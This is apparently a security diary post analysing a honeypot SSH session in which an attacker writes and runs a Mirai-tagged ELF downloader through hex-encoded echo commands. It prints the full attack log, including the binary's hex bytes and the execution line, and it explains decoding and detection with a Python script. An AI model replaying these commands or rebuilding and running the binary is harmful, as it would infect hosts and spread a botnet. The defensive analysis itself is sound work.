Hiding in Hex

Published: 2023-10-18. Last Updated: 2023-10-18 02:07:28 UTC
by Jesse La Grew (Version: 1)

DShield honeypots [1] see a variety of attacks. Most of the time the commands are human-readable, but every now and again they are obfuscated using base64 or hex encoding. A quick search for commands containing the "\x" delimiter returns many results encoded in hexadecimal.



Figure 1: Example of hex obfuscated data from cowrieprocessor [2] SQLite file. 

 

The session highlighted in the example above shows a command that looks like hex characters. Looking at a similar session, the hex encoding was used multiple times to iteratively write a malware file. 

                       Session  e7333c3c2f12                                      
                      Protocol  ssh                                               
                      Username  Mroot                                             
                      Password  cat1029                                           
                     Timestamp  2022-07-16T07:59:34.450260Z                       
             Source IP Address  194.31.98.244                                     
               URLhaus IP Tags  intel, elf, mirai, 32                             
                        ASNAME  AS-SERVERION Serverion B.V.                       
                     ASCOUNTRY  NL                                                
            Total Commands Run  30    

////////////////// COMMANDS ATTEMPTED //////////////////

# >/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/var/.l && cd /var/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/dev/.l && cd /dev/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/mnt/.l && cd /mnt/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/var/run/.l && cd /var/run/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/var/tmp/.l && cd /var/tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/.l && cd /; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/dev/netslink/.l && cd /dev/netslink/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/dev/shm/.l && cd /dev/shm/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/bin/.l && cd /bin/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/etc/.l && cd /etc/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/boot/.l && cd /boot/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/usr/.l && cd /usr/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# >/sys/.l && cd /sys/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'
# rm -rf ddnsclient;rm -rf ntpclient; cp /bin/echo ddnsclient; >ddnsclient; cp ddnsclient ntpclient; chmod 777 ddnsclient; chmod 777 ntpclient
# echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x03\x00\x01\x00\x00\x00\xd7\x82\x04\x08\x34\x00\x00\x00\x1c\x04\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x04\x08\x00\x80\x04\x08\xfe\x03\x00\x00\xfe\x03\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\x00\x04\x00\x00\x00\x94\x04\x08\x00\x94\x04\x08\x00\x00\x00\x00\x58\x00\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x51\xe5\x74\x64\x00\x00\x00\x00\x00\x00\x00\x00' > ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x55\x89\xe5\x0f\xb6\x4d\x0c\x0f\xb6\x45\x14\xc1\xe1\x10\x09\xc1\x0f\xb6\x45\x08\xc1\xe0\x18\x09\xc1\x0f\xb6\x45\x10\x5d\xc1\xe0\x08\x09\xc1\x89\xca\xc1\xe2\x18\xc1\xe0\x08\x09\xd0\x89\xca\x81\xe2\x00\x00\xff\x00\xc1\xea\x08\x09\xd0\xc1\xe9\x18\x09\xc8\xc3\x55\x89\xe5\x83\xec\x10\xff\x75\x08\x6a\x01\xe8\xf0\x01\x00\x00\x83\xc4\x10\xc9\xc3\x55\x89\xe5\x83\xec\x10\xff\x75\x08\x6a\x06' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\xe8\xdb\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x05\xe8\xc3\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x03\x6a\x66\xe8\x9c\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x04\xe8\x84\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x08\xff\x75\x10\xff\x75\x0c\xff\x75\x08\x6a\x03\xe8\x6c\x01\x00\x00\xc9\xc3\x55\x89\xe5\x83\xec\x1c\x8b\x45\x08\x89' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x45\xf4\x8b\x45\x0c\x89\x45\xf8\x8b\x45\x10\x89\x45\xfc\x8d\x45\xf4\x50\x6a\x01\x6a\x66\xe8\x45\x01\x00\x00\xc9\xc3\x55\xba\xd2\x83\x04\x08\x89\xe5\x57\x56\x53\x31\xdb\x81\xec\xac\x00\x00\x00\xeb\x01\x43\x8a\x02\x42\x84\xc0\x75\xf8\x68\xf4\x00\x00\x00\x6a\x62\x6a\x1f\x68\xc2\x00\x00\x00\x66\xc7\x45\xe0\x02\x00\x66\xc7\x45\xe2\x00\x50\xe8\xc7\xfe\xff\xff\x83\xc4\x0c\x68\xff\x01\x00\x00\x68\x41\x02\x00\x00\x68\xd6\x83\x04\x08\x89\x45\xe4\xe8\x14\xff\xff\xff\x83\xc4\x0c\x6a\x00\x6a\x01\x6a\x02\x89\xc7\xe8\x73' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\xff\xff\xff\x83\xc4\x10\x83\xf8\xff\x89\xc6\x74\x05\x83\xff\xff\x75\x0d\x83\xec\x0c\x6a\x01\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x50\x6a\x10\x8d\x45\xe0\x50\x56\xe8\xf3\xfe\xff\xff\x83\xc4\x10\x85\xc0\x79\x0e\x83\xec\x0c\xf7\xd8\x50\xe8\xa2\xfe\xff\xff\x83\xc4\x10\x50\x8d\x43\x1a\x31\xdb\x50\x68\xe0\x83\x04\x08\x56\xe8\xf3\xfe\xff\xff\x83\xc4\x10\x50\x6a\x01\x8d\x45\xf3\x50\x56\xe8\xfb\xfe\xff\xff\x83\xc4\x10\x48\x74\x0d\x83\xec\x0c\x6a\x04\xe8\x6d\xfe\xff\xff\x83\xc4\x10\x0f\xbe\x45\xf3\xc1\xe3\x08\x09\xc3\x81' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\xfb\x0a\x0d\x0a\x0d\x75\xcf\x8d\x9d\x60\xff\xff\xff\x51\x68\x80\x00\x00\x00\x53\x56\xe8\xc4\xfe\xff\xff\x83\xc4\x10\x85\xc0\x7e\x0e\x52\x50\x53\x57\xe8\x9c\xfe\xff\xff\x83\xc4\x10\xeb\xde\x83\xec\x0c\x56\xe8\x3d\xfe\xff\xff\x89\x3c\x24\xe8\x35\xfe\xff\xff\xc7\x04\x24\x05\x00\x00\x00\xe8\x14\xfe\xff\xff\x83\xc4\x10\x8d\x65\xf4\x5b\x5e\x5f\x5d\xc3\x55\x89\xe5\x5d\xe9\xbd\xfe\xff\xff\x57\x56\x53\x83\xec\x10\x8d\x44\x24\x3c\x8b\x54\x24\x24\x89\x44\x24\x0c\x8b\x44\x24\x34\x8d\x5c\x24\x04\x8b\x4c\x24\x28\x8b\x7c' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x24\x2c\x8b\x74\x24\x30\x89\x44\x24\x04\x8b\x44\x24\x38\x89\x44\x24\x08\x8b\x44\x24\x20\x53\xe8\x45\x00\x00\x00\x83\xc4\x04\x83\xec\x0c\x50\xe8\x78\x00\x00\x00\x83\xc4\x20\x5b\x5e\x5f\xc3\x90\x57\x53\x89\xd3\x89\xfa\x8b\x7c\x24\x0c\x50\xe8\x06\x00\x00\x00\x89\xda\x5b\x5b\x5f\xc3\x8b\x04\x24\x05\x14\x11\x00\x00\x8b\x00\x85\xc0\x74\x06\x50\x8b\x44\x24\x08\xc3\x8b\x44\x24\x04\xcd\x80\xc3\x55\x50\x8b\x6c\x24\x0c\x8b\x45\x00\x8b\x6d\x04\x50\x8b\x44\x24\x04\xe8\xb9\xff\xff\xff\x5d\x5d\x5d\xc3\x8d\x44\x24\x18\x56' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x57\x50\x8b\x44\x24\x10\x8b\x54\x24\x14\x8b\x4c\x24\x18\x8b\x7c\x24\x1c\x8b\x74\x24\x20\xe8\xc6\xff\xff\xff\x5f\x5f\x5e\xc3\x90\x53\x83\xec\x08\x8b\x5c\x24\x10\x81\xfb\x00\xf0\xff\xff\x89\xd8\x77\x05\x83\xc4\x08\x5b\xc3\xe8\x0c\x00\x00\x00\xf7\xdb\x89\x18\xb8\xff\xff\xff\xff\xeb\xeb\x90\x65\xa1\x00\x00\x00\x00\x83\xc0\x28\xc3\x78\x38\x36\x00\x6e\x74\x70\x63\x6c\x69\x65\x6e\x74\x00\x47\x45\x54\x20\x2f\x73\x73\x68\x2f\x6e\x65\x77\x2f\x78\x38\x36\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x2e' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\xa0\x80\x04\x08\xa0\x00\x00\x00\x32\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x10\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\xd2\x83\x04\x08\xd2\x03\x00\x00' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# echo -ne '\x2c\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00\x08\x00\x00\x00\x03\x00\x00\x00\x00\x94\x04\x08\x00\x04\x00\x00\x58\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x20\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\x03\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'
# ./ddnsclient; chmod 777 ntpclient; ./ntpclient scan.x86
# kill %%1
# echo A

 

There are a variety of ways to decode this information, and I decided to use CyberChef [3] to recreate it.


Figure 2: CyberChef decoding of malware file

 

The recipe can also be added to so that the SHA-256 hash can be looked up using other tools such as VirusTotal [4]. 


Figure 3: Getting SHA-256 hash of decoded file in CyberChef

 

This can also be decoded from the command line.

echo '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45' | xxd -r -p
PATH_DONE

 

In this example, no file creation was logged in cowrie. This means the SHA-256 hash of the file wasn't available and there was no other obvious information that malware was included in this attack. Consider this kind of obfuscation and how it can be detected using monitoring tools. The file creation itself may have been detected and flagged by antivirus software, but this kind of obfuscation could have been captured and analyzed before the file was created. 
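
One way to catch and decode this pattern directly from logged commands, as an added example that is not from the original diary or from cowrieprocessor: the script flags commands carrying "\x" escapes, replays the ">" and ">>" redirections to rebuild each file, and reports its size, ELF magic check and SHA-256. The function names and the shortened sample session are constructed for illustration.

```python
import hashlib
import re

HEX_RE = re.compile(r"\\x([0-9a-fA-F]{2})")
# echo -ne / -en '<\xNN...>' followed by > (truncate) or >> (append) and a target file
WRITE_RE = re.compile(
    r"echo\s+-[ne]+\s+'((?:\\x[0-9a-fA-F]{2})+)'\s*(>>?)\s*([^\s;&|]+)")

def decode_hex(escaped):
    """Turn a string of literal \\xNN escapes into the bytes they represent."""
    return bytes(int(h, 16) for h in HEX_RE.findall(escaped))

def flag_hex_commands(commands, min_escapes=4):
    """Detection pass: commands carrying at least min_escapes \\xNN escapes."""
    return [c for c in commands if len(HEX_RE.findall(c)) >= min_escapes]

def rebuild_files(commands):
    """Replay redirections in order; return {filename: reassembled bytes}.
    Simplification: filenames are used as written, 'cd' is not tracked."""
    files = {}
    for cmd in commands:
        for payload, op, name in WRITE_RE.findall(cmd):
            data = decode_hex(payload)
            files[name] = data if op == ">" else files.get(name, b"") + data
    return files

def summarize(commands):
    """Size, ELF magic check and SHA-256 for each file written via echo."""
    return {name: {"size": len(data),
                   "is_elf": data.startswith(b"\x7fELF"),
                   "sha256": hashlib.sha256(data).hexdigest()}
            for name, data in rebuild_files(commands).items()}

# Constructed sample in the shape of the session above (payload shortened).
SAMPLE = [
    r">/tmp/.l && cd /tmp/; echo -en '\x50\x41\x54\x48\x5f\x44\x4f\x4e\x45'",
    r"rm -rf ddnsclient; cp /bin/echo ddnsclient; >ddnsclient",
    r"echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x00' > ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'",
    r"echo -ne '\x00\x00\x00\x00' >> ddnsclient; echo -e '\x45\x43\x48\x4f\x44\x4f\x4e\x45'",
]

if __name__ == "__main__":
    for cmd in flag_hex_commands(SAMPLE):
        print("hex-encoded:", cmd[:60])
    for name, info in summarize(SAMPLE).items():
        print(name, info)
```

Run against the full command list of a session, the SHA-256 it reports can be looked up the same way as the CyberChef result, even when the honeypot logged no file creation.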

 

[1] https://isc.sans.edu/honeypot.html
[2] https://github.com/jslagrew/cowrieprocessor
[3] https://gchq.github.io/CyberChef
[4] https://www.virustotal.com/gui/file/7bcea3cb620f907cd44d0995c2c4400f396369636c1c3a5c60c7f80a1dfd05f9/detection

--
Jesse La Grew
Handler
